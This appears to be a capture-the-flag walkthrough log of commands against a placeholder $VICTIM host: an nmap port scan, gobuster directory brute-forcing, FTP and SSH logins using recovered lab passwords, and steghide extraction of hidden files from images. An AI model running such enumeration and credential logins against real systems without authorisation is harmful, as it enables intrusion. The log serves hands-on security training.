No other ports found.
nmap -sV -sT -O -p 1-65535 $VICTIM
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
gobuster dir -u http://$VICTIM/island -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
gobuster dir -u http://$VICTIM/island/2100 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x ticket
ftp $VICTIM
Username: vigilante
Password: !#th3h00d
mget *
exiftool Leave_me_alone.png
sudo apt install ncurses-hexedit
exiftool Leave_me_alone.png
steghide info aa.jpg
Password: password
steghide extract -sf aa.jpg
Password: password
unzip ss.zip
ssh slade@$VICTIM
Password: M3tahuman